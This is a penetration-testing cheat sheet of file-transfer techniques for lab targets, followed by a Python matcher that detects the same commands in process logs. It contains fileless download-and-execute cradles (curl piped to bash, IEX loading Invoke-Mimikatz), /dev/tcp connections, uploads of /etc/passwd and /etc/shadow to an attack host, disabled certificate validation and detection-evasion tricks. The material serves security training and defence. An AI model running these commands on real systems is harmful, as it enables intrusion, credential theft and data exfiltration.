Penetration Testing Notes
File Transfers

Last updated 1 year ago

Download Operations

Terminal String Copy & Paste

Linux Encode Base64

cat id_rsa |base64 -w 0;echo

Windows Decode & Write Base64

[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("BASE 64 STRING"))

Web Downloads with Wget & cURL

Download a File Using wget

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

Fileless Download with wget

wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Download a File Using cURL

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Fileless Download with cURL

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

Download with Bash (/dev/tcp)

Connect to the Target Webserver

exec 3<>/dev/tcp/10.10.10.32/80

HTTP GET Request

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

Print the Response

cat <&3

PowerShell Web Downloads

DownloadFile Method

(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')

DownloadString - Fileless Method

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

Invoke-WebRequest

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

Common Errors with PowerShell

Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Downloads

Create the SMB Server

sudo impacket-smbserver share -smb2support /tmp/smbshare

Copy a File from the SMB Server

copy \\192.168.220.133\share\nc.exe

Create the SMB Server with Username & Password

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

Mount the SMB Server with Username and Password

net use n: \\192.168.220.133\share /user:test test

FTP Downloads

Installing the FTP Server Python3 Module - pyftpdlib

sudo pip3 install pyftpdlib

Setting up a Python3 FTP Server

sudo python3 -m pyftpdlib --port 21

Transferring Files from an FTP Server Using PowerShell

(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

Command File for FTP Client To Download File

echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Upload Operations

Terminal String Copy & Paste

Windows Encode & Write Base64

[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

Linux Decode Base64

echo Base64string | base64 -d > hosts

Web Uploads with cURL

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

PowerShell Web Uploads

Installing a Configured WebServer with Upload

pip3 install uploadserver
python3 -m uploadserver

PowerShell Script to Upload a File to Python Upload Server

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

PowerShell Base64 Web Upload

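# On the Windows host: Base64-encode the file and send it as the POST body
$b64 = [System.Convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
# On the attack host: start the listener before the request is sent, then decode the Base64 body it receives
nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hosts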

SMB Uploads

Installing WebDav Python modules

sudo pip3 install wsgidav cheroot

Using the WebDav Python module

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Connecting to the Webdav Share

dir \\192.168.49.128\DavWWWRoot

Uploading Files using SMB

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

FTP Uploads

sudo python3 -m pyftpdlib --port 21 --write

PowerShell Upload File

(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

Command File for FTP Client to Upload File

echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Mounting a Linux Folder With RDP

Mounting Using rdesktop

rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'

Mounting Using xfreerdp

xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer

Evading Detection

Listing out User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Request with Chrome User Agent

$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

Transferring File with GfxDownloadWrapper.exe

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

Notes

Terminal String Copy & Paste: cmd.exe has a maximum string length of 8,191 characters, and powershell.exe has a maximum string length of 2,147,483,647 characters.
Invoke-WebRequest: You can use the aliases iwr, curl, and wget instead of the full Invoke-WebRequest name.
Common Errors with PowerShell: There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. This can be bypassed using the parameter -UseBasicParsing.
Common Errors with PowerShell: Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} command listed in that section.
Create the SMB Server with Username & Password: New versions of Windows block unauthenticated guest access.
Mount the SMB Server with Username and Password: You can also mount the SMB server if you receive an error when you use copy filename \\IP\sharename.
Command File for FTP Client To Download File: You may not have an interactive shell. If that's the case, we can create an FTP command file to download a file.
SMB Uploads: Enterprises commonly don't allow the SMB protocol (TCP/445). An alternative is to run SMB over HTTP with WebDav. When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.
Connecting to the Webdav Share: DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. You can avoid using this keyword if you specify a folder that exists on your server when connecting to the server. For example: \\192.168.49.128\sharefolder
Uploading Files using SMB: If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.
FTP Uploads: You need to specify the option --write to allow clients to upload files to our attack host.
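
A defender's view of the commands on this page, as an added example that is not part of the original notes: a Python matcher that flags process command lines containing the transfer patterns listed above (download cradles, WebClient transfers, disabled certificate validation, custom user agents, GfxDownloadWrapper.exe, FTP command files, /dev/tcp, pipe-to-interpreter). The rule names, host names and 192.0.2.x sample telemetry are constructed for illustration.

```python
import re

# Detection rules keyed to the transfer commands listed on this page.
# Rule names are made up for this example; tune the patterns before production use.
RULES = [
    ("ps-download-cradle", r"\b(IEX|Invoke-Expression)\b.*\bDownloadString\b"
                           r"|\b(Invoke-WebRequest|iwr)\b.*\|\s*(IEX|Invoke-Expression)\b"),
    ("ps-webclient-transfer", r"Net\.WebClient\)?\.(DownloadFile|UploadFile)\b"),
    ("ps-tls-validation-off", r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}"),
    ("ps-custom-user-agent", r"PSUserAgent\]::\w+|\s-UserAgent\b"),
    ("ps-base64-file-write", r"WriteAllBytes\(.*FromBase64String"),
    ("lolbin-gfxdownloadwrapper", r"GfxDownloadWrapper\.exe\b.*https?://"),
    ("ftp-command-file", r"\bftp(\.exe)?\b.*\s-s:\S+"),
    ("sh-pipe-to-interpreter", r"\b(curl|wget)\b[^|]*\|\s*(bash|sh|python3?)\b"),
    ("bash-dev-tcp", r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def classify(cmdline):
    """Return the names of every rule that matches one process command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]


def scan(events):
    """events: iterable of (host, cmdline). Return (host, cmdline, hits) for flagged events."""
    flagged = []
    for host, cmdline in events:
        hits = classify(cmdline)
        if hits:
            flagged.append((host, cmdline, hits))
    return flagged


# Constructed sample telemetry (process-creation command lines); host names and
# 192.0.2.x addresses are placeholders, not values from the page.
SAMPLES = [
    ("ws01", r"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"),
    ("ws01", r"powershell.exe Get-ChildItem C:\Users"),
    ("ws02", r'GfxDownloadWrapper.exe "http://192.0.2.10/tool.exe" "C:\Temp\tool.exe"'),
    ("ws02", r"ftp -v -n -s:ftpcommand.txt"),
    ("web01", r"bash -c exec 3<>/dev/tcp/192.0.2.10/80"),
    ("web01", r"curl http://192.0.2.10/LinEnum.sh | bash"),
    ("web01", r"curl -o /tmp/report.pdf https://intranet.example.test/report.pdf"),
]

if __name__ == "__main__":
    for host, cmdline, hits in scan(SAMPLES):
        print(f"{host}: {', '.join(hits)} <- {cmdline}")
```

Suitable inputs are process-creation command lines (Sysmon Event ID 1, Windows Security Event ID 4688, auditd execve records) and PowerShell script block text (Event ID 4104), which also captures commands typed into an interactive session.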